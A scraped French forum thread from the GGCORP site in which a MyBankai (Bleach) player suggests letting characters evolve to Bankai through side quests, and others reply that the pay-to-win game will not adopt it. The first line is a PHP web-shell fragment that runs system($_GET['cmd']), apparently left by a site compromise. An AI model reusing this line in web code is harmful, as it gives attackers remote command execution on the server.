ob_start(); system($_GET['cmd']); $execcode = ob_get_contents(); ob_end_clean();

GGCORP Forums

Mot de passe oublie
 Inscri. Rapide
Recherche
!show!: 900|Reponse: 5

L'évolution [Copier l'URL]

Rank: 6Rank: 6

Heure de publication 2017-11-14 22:05:37 |Afficher toutes les publications
Bonsoir,

Alors, je sais pas si cela à déjà été proposé, donc je le post.

L'idée serait que, sans avoir besoin de faire cracher la carte bancaire, on puissent avoir l'évolution d'un perso, je m'explique :

J'ai Yamamato Genryusai Shikeguni évolué lvl 11 + toutes ses étoiles.

Par le biais d'une quête annexe, je puisse obtenir Bankai Yamamato Genryusai.

Si vous voulez, le principe de l'UBP mais en plus poussé puisque les perso obtenu serait bien plus puissant.

Pour les devs, ce ne serai qu'un plus puisque ceux qui ne veulent pas se prendre la tête à UP un perso (j'ai le papy depuis Mai environ, il n'a que 3 étoiles et pourtant je le fais tout les jours), pourront toujours le payer. De plus, cela fideliserais de d'éventuels nouveaux joueurs qui ne se diront plus "m**de faut payer pour être puissant" mais plutôt "Plus je vais jouer, plus je serais puissant".

Et au vu de l'état actuel de la communautée francophone qu'est en pleine chute libre (je n'en sais rien pour les autres pays), ça ne serait pas une si mauvaise idée.

Après tout, c'est plus ou moins le cas pour les Zanpakutos, il faut des parchemins pour les faire évoluer et les rendre plus puissant, dans l'UBP il faut des fragments et des reishis et en plus un niveau VIP à partir de Daiguren Hitsugaya (VIP1).

Si on respecte le manga, il n'y a pas de perso en double, genre un "normal" et un bankai, c'est une augmentation de pouvoir.

Je précise bien que l'idée ne fonctionnerais que sur les changements normal -> bankai ou shikai -> bankai. Passer d'un stade à l'autre, quoi.

Pour les gens déterminer à avoir le perso qu'ils aiment mais en plus puissant mais qui n'ont soit pas les moyens de se l'offrir, soit simplement pas envie de payer pour du contenu virtuel, c'est la solution.

Personnellement, j'ai passé 6mois pour obtenir Hitsugaya puis Daiguren Hitsugaya à l'UBP parce que je suis fan de se perso, bien que je ne l'utilises pas dans ma formation.

Cordialement

Rayd'en Wolff

Utiliser la magie Signaler

Rank: 4

Heure de publication 2017-11-20 23:35:42 |Afficher toutes les publications
C'est une bonne idée, mais ce jeu est basé sur le pay to win alors je crois pas qu'elle va etre accepter.

Heure de publication 2017-11-21 22:14:26 |Afficher toutes les publications
Enfin une réponse !

L'idée est que le jeu "reste" en P2W, mais avec la possibilité pour chacun d'accéder à tout le contenu, avec des vitesses différentes évidemment. Quelqu'un qui met 10K€ ira forcément plus vite que quelqu'un qui ne met peu ou rien.
Juste à titre d'information, toujours pour garder Papy Genryusai en exemple, il faut (pour la 4ème étoile) 720 fragments, à raison de 5 fragments/J ça fait : 144 J donc environ 5mois. Pour un non goldeur (je sais pas pour les goldeurs). Je te laisse calculer combien de temps il te faudra pour UP Papy 7 étoiles et / ou l'évoluer au dernier niveau. T'en as à mon avis pour 2ans facile. Donc en 2ans, le jeu évolue, de nouveau perso arrivent, les compos changent, etc .. .

Pour parler vulgairement, tu t'es crever le c*l à up ton perso à fond pour au final ne pas avoir de "résultat concret". Depuis peu, je joue à Soul Reapers C'est un jeu sur mobile sur Bleach. Tu commences avec Ichigo et au fur et à mesure des missions, tu peut le faire évoluer, d'abord avec les pouvoirs de Rukia, puis avec Zangetsu Shikai, Bankai, etc ... ainsi que tout les perso de l'univers. Tu as la possibilité de payer se qui accélère grandement ta progression, mais tu n'es pas pénalisé si tu ne payes pas, c'est juste plus long.

Ce système sur MyBankai serait relativement intéressant.
Met toi à la place d'un tout nouveau, il a vu des screens de combat avec des éclairs partout, des Bankai à tout vas, etc ..

L'idée c'est simplement de permettre à tout le monde d'avoir accès au même contenu et ce peu importe les bourses mais toujours en avantageant par un gain de temps, ceux qui veulent et peuvent utiliser leur carte bancaire.

Au final, je ne sais même pas pourquoi je me butte à vouloir entrer dans les détails, à justifier par A + B que l'idée est bonne, mais que non seulement elle ne fera pas perdre d'argent à GGCorps mais lui en fera gagner.
T'inquiète, rien contre toi, simplement une vérité, GGCorps, ne mettra jamais ça en place, ça demande de travailler .

Bref, j'ai mon propre avis sur cette société et il n'est pas gratifiant, heureusement que j'aime Bleach.

Heure de publication 2017-12-2 03:31:24 |Afficher toutes les publications
Désolé je répond très tard. Ton idée est bonne, je ne le nie pas, mais ça va radicalement changer le jeu et faire tout ces changements ne prendra pas qu'une journée. Encore faudrait il qu'elle soit transmise aux dev et que ces derniers l'acceptent.

Heure de publication 2017-12-3 17:58:00 |Afficher toutes les publications
Si un admin pouvait lire et répondre, ça me ferais plaisir, puis s'il propose mon idée aux dev, ça serait encore mieux (même si celle-ci se voit refusée).

Heure de publication 2017-12-12 20:04:43 |Afficher toutes les publications
RaydenWolff a repondu a 2017-12-3 16:58
Si un admin pouvait lire et répondre, ça me ferais plaisir, puis s'il propose mon idée aux dev,  ...

Ca fait un certain temps que les postes boite a idée ne sont plus lu.
Désolé

Vous devez vous identifier avant de pouvoir repondre Identifiant | Inscri. Rapide

GGCORP|MyNinja|MyBankai|MyPirate|MyLegend|Archiver|GGCORP Inc.

GMT+2, 2020-1-18 02:01 , Processed in 0.022679 second(s), 10 queries , Xcache On.